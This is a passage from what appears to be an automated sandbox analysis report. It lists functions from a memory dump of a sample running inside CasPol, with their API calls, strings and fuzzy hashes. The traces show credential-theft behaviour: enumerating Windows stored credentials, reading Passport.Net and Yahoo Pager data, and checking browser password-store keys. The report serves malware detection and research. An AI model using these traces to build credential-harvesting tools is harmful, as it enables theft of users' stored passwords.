                                                                                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                    • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                  • API String ID: 2726666094-3614832568
                                                                                                                                                                                  • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                  Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                  • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                  • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1786725549-0
                                                                                                                                                                                  • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                  • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                  Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2014771361-0
                                                                                                                                                                                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                  Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                  • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                  • String ID: global-salt$password-check
                                                                                                                                                                                  • API String ID: 231171946-3927197501
                                                                                                                                                                                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                  Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  • Opcode ID: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                                                                                                                                                                                  • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                  • Opcode Fuzzy Hash: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                  Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 19018683-0
                                                                                                                                                                                  • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                  • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                  • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                  • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                  Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                    • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                  Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                  • memset.MSVCRT ref: 00444978
                                                                                                                                                                                  • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                  • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset$strlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2142929671-0
                                                                                                                                                                                  • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                  • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                  • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                  Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                  • String ID: Passport.Net\*
                                                                                                                                                                                  • API String ID: 2329438634-3671122194
                                                                                                                                                                                  • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                  • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                  Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                  • String ID: Personalities
                                                                                                                                                                                  • API String ID: 2103853322-4287407858
                                                                                                                                                                                  • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                  • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                  Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00444573
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                  • API String ID: 1830152886-1703613266
                                                                                                                                                                                  • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                  • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                  • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                  Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                                                                                  • API String ID: 1670431679-1552265934
                                                                                                                                                                                  • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                  • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                  • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                  Function 00410F99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410FB0
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                  • API String ID: 145871493-1506664499
                                                                                                                                                                                  • Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                  • Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
                                                                                                                                                                                  • Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69
                                                                                                                                                                                  Function 0043DF30 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 479COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                  • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                  • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                  • String ID: $no query solution
                                                                                                                                                                                  • API String ID: 368790112-326442043
                                                                                                                                                                                  • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                  • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                                                                  • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                  • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                                                                  Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                                                                                  • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
